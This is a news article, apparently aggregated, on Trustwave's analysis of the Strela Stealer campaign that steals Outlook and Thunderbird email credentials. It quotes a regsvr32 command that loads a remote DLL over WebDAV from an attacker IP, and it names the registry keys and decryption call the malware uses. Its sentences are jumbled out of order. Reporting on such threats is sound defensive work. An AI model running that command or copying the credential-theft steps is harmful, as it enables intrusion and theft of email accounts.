The Strela Stealer, named after the Russian word for “Arrow,” has been actively targeting systems since late 2022, with a precise focus on exfiltrating email credentials from both Microsoft Outlook and Mozilla Thunderbird email clients. When these keys are located, the malware reads the “IMAP User,” “IMAP Server,” and “IMAP Password” values, decrypting protected data using the CryptUnprotectData API function. The command “cmd /c regsvr32 /s \\193.143[.]1.205@8888\davwwwroot\1909835116765[.]dLL” reveals how the malware loads its second stage directly into memory without saving it to disk, a technique designed to evade detection by traditional antivirus solutions. The malware searches the Windows registry for Outlook profile data, specifically targeting keys such as “HKCU\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676” where email configuration is stored. The stolen credentials and system information are then transmitted to the attacker’s server using HTTP POST requests, allowing the threat actors to gain unauthorized access to victims’ email accounts. Cybersecurity researchers at Trustwave have discovered a sophisticated malware campaign targeting Microsoft Outlook users to steal their login credentials. The malware verifies system locale before proceeding with data exfiltration, using a complex bit-checking routine that ensures it only activates on targeted systems. The initial stage of the attack involves a heavily obfuscated JScript file that verifies if the target system is located in one of the targeted countries by checking the system’s locale identifier (LCID). Recent attacks involve forwarding legitimate emails containing invoices, but replacing the original attachments with ZIP archives containing the malware loader. Trustwave researchers noted that the malware implements a multi-stage infection process with custom multi-layer obfuscation and code-flow flattening to complicate analysis. Cyber Security News is a Dedicated News Platform For Cyber News, Cyber Attack News, Hacking News & Vulnerability Analysis. The script queries the Windows registry key “Control Panel\International\Locale” and compares it against predefined values for German-speaking countries. The final stage of Strela Stealer focuses specifically on stealing Microsoft Outlook credentials.
This Cyber News was published on cybersecuritynews.com. Publication date: Mon, 10 Mar 2025 13:35:21 +0000